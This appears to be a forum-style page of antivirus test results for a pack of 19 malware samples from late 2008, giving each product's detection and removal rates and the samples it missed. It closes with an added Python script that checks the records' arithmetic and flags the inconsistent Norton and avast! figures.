Files remaining: 6
Not detected: 0
Detected but not removed: 6
Detection rate: 19/19 = 100%
Removal rate: 13/19 = 68.4%
Remaining files:
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Detected but not removed files:
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Tester: kitman231

Jiangmin Antivirus KV2008 (江民防毒)
Scan engine version: 11.00.800
Signature date: 2008/12/25
Heuristics: off
Count shown by the AV: not recorded (the tester forgot to note it)
Actual number of files: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files:
none
Detected but not removed files:
none
Tester: PHT

Panda Internet Security
AV version: 2009 (14.00.00)
Signature date: 2008/12/26
Heuristics: high
Test environment: Windows Vista Ultimate SP1 x86
Other: manual scan set to delete on detection
Count shown by the AV: 18/19
Actual number of files: 19 (objects inside the archive)
Files removed: 16 (objects inside the archive)
Files remaining: 3 (objects inside the archive)
Detected by heuristics: 1
Not detected: 0 (objects inside the archive)
Detected but not removed: 3
Detection rate: 19/19 = 100%
Removal rate: 16/19 = 84%
Remaining files:
Trojan2008.12.24@007
Trojan2008.12.24@009
Worm2008.12.24@002
Detected but not removed files:
Trojan2008.12.24@007
Trojan2008.12.24@009
Worm2008.12.24@002
Detected but quarantine only:
none
Tester: Shisin

ESET NOD32 Antivirus
AV version: 3.0.669.0
Signature version: 3718
Signature date: 2008/12/26
Heuristics: advanced
Test environment: Windows XP Professional SP3 x86 (VMware)
Other: manual scan, default settings, delete on detection
Count shown by the AV: 18/43
Actual number of files: 19
Files removed: 18
Files remaining: 1
Not detected: 1
Detected but not removed: 0
Detection rate: 18/19 = 94.7%
Removal rate: 18/19 = 94.7%
Remaining files:
[email protected]
Detected but not removed files:
none
Detected but quarantine only:
none
Tester: 小狄~

Norton Internet Security
AV version: 2009 (16.2.0.7)
Signature date: 2008/12/28
Test environment: Windows 7 build 6956
Other:
Count shown by the AV: 39/15
Actual number of files: 19
Files removed: 15
Files remaining: 4
Not detected: 4
Detected but not removed: 4
Detection rate: 15/19 = 79%
Removal rate: 15/19 = 79%
Remaining files (checked after the reboot completed):
Trojan2008.12.24@003
Trojan2008.12.24@009
Worm2008.12.24@001
Worm2008.12.24@002
Detected but not removed files (checked after the reboot completed):
none
Detected but quarantine only:
none
Tester: ss30102

PC Tools Internet Security
AV version: 2009 (6.0.0.386)
Signature date: 2008/12/28
Test environment: Windows XP
Other:
Count shown by the AV: 19/14
Actual number of files: 19
Files removed: 14
Files remaining: 5
Not detected: 5
Detected but not removed: 5
Detection rate: 14/19 = 74%
Removal rate: 14/19 = 74%
Remaining files (checked after the reboot completed):
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Detected but not removed files (checked after the reboot completed):
none
Detected but quarantine only:
none
Tester: ss30102

VBA32 Workstation (1)
AV version: 3.12.8.10
Signature version: 2008/12/21 08:09
Heuristics: Excessive
Test environment: Windows XP SP2 in VMware
Other:
Thorough scanning mode
Detect Spyware, Adware, Riskware
Detect installers of malware
Mail scanning
Count shown by the AV: N/A
Actual number of files: 19
Files removed: 17 (16 known threats + 0 known adware + 1 unknown threat)
Files remaining: 2
Not detected: 2
Detected but not removed: 0
Detection rate: 17/19 = 89.47%
Removal rate: 17/19 = 89.47%
Remaining files:
[email protected]
[email protected]
Detected but not removed files:
N/A
Tester: 000110

VBA32 Workstation (2)
AV version: 3.12.8.10
Signature version: 2008/12/21 08:09
Heuristics: default settings
Test environment: Windows XP SP2 in VMware
Other: right-click scan (i.e. default settings)
Count shown by the AV: N/A
Actual number of files: 19
Files removed: 15
Files remaining: 4
Not detected: 4
Detected but not removed:
Detection rate: 15/19 = 78.95%
Removal rate: 15/19 = 78.95%
Remaining files:
[email protected]
[email protected]
[email protected]
[email protected]
Detected but not removed files:
N/A
Tester: 000110

avast! Antivirus
AV version: 4.8.1296
Signature date: 2008/12/28
Test environment: Windows Vista Home Basic x86 (physical machine)
Count shown by the AV: 60/23
Actual number of files: 19
Files removed: 18
Files remaining: 1
Not detected: 1
Detected but not removed: 0
Detection rate: 18/19 = 95%
Removal rate: 18/18 = 100%
Remaining files:
[email protected]
Tester: 戴計 Tai Kai
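Every test record above uses the same fields, so the arithmetic between them can be checked mechanically: detected equals the sample count minus "not detected", it also equals "removed" plus "detected but not removed", remaining equals the sample count minus removed, and both rates are taken over the sample count. Several records on this page do not satisfy all of these (the Norton record reports 4 not detected and 4 detected-but-not-removed alongside 15 removed, and the avast! record computes its removal rate as 18/18 against the detected count rather than the 19 samples). The following is an added example written for this page, not code from the ACVL lab: it parses a record in the form used above and reports which relations fail. RECORDS is constructed for the example from figures on this page: one consistent record, one with the Norton figures and one with the avast! figures.

```python
"""Added example: arithmetic consistency check for the AV test records
(illustrative code written for this page, not part of the ACVL report)."""
import re
from fractions import Fraction

# Field labels as used in the records above -> short keys.
FIELDS = {
    "actual": "Actual number of files",
    "removed": "Files removed",
    "remaining": "Files remaining",
    "not_detected": "Not detected",
    "not_removed": "Detected but not removed",
}
RATE_RE = re.compile(r"(\d+)\s*/\s*(\d+)\s*=\s*([\d.]+)\s*%")

# Constructed records using figures that appear in the reports on this page.
RECORDS = {
    "consistent": """\
Actual number of files: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
""",
    "norton_figures": """\
Actual number of files: 19
Files removed: 15
Files remaining: 4
Not detected: 4
Detected but not removed: 4
Detection rate: 15/19 = 79%
Removal rate: 15/19 = 79%
""",
    "avast_figures": """\
Actual number of files: 19
Files removed: 18
Files remaining: 1
Not detected: 1
Detected but not removed: 0
Detection rate: 18/19 = 95%
Removal rate: 18/18 = 100%
""",
}


def parse_record(text: str) -> dict:
    """Pull the counts and the two rate lines out of one test record."""
    rec = {}
    for line in text.splitlines():
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip(), value.strip()
        for key, label in FIELDS.items():
            if name == label and value:
                rec[key] = int(value.split()[0])  # tolerates "19 (objects inside the archive)"
        if name in ("Detection rate", "Removal rate"):
            m = RATE_RE.search(value)
            if m:
                rec[name.split()[0].lower() + "_rate"] = (int(m[1]), int(m[2]), float(m[3]))
    return rec


def check_record(rec: dict) -> list:
    """Human-readable inconsistencies; an empty list means the record adds up."""
    problems = []
    actual, removed = rec["actual"], rec["removed"]
    detected = actual - rec["not_detected"]
    not_removed = rec.get("not_removed", 0)
    if removed + not_removed != detected:
        problems.append(f"removed ({removed}) + detected-but-not-removed ({not_removed}) "
                        f"!= detected ({detected})")
    if "remaining" in rec and rec["remaining"] != actual - removed:
        problems.append(f"remaining ({rec['remaining']}) != actual - removed ({actual - removed})")
    for label, expected in (("detection_rate", detected), ("removal_rate", removed)):
        if label not in rec:
            continue
        num, den, pct = rec[label]
        if den != actual:
            problems.append(f"{label} denominator is {den}, not the sample count {actual}")
        if num != expected:
            problems.append(f"{label} numerator is {num}, expected {expected}")
        if den and abs(float(Fraction(num, den) * 100) - pct) > 0.5:  # allow rounding
            problems.append(f"{label}: {num}/{den} is not {pct}%")
    return problems


def check_all(records: dict = RECORDS) -> dict:
    """Map record name -> list of problems, for every record given."""
    return {name: check_record(parse_record(text)) for name, text in records.items()}


if __name__ == "__main__":
    for name, problems in check_all().items():
        print(name, "OK" if not problems else "; ".join(problems))
```

Running the check before a pack report is published catches the two kinds of slip visible on this page: a count that was typed into the wrong field, and a rate computed against the detected count instead of the sample count, which quietly inflates the removal rate of a product that missed samples.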
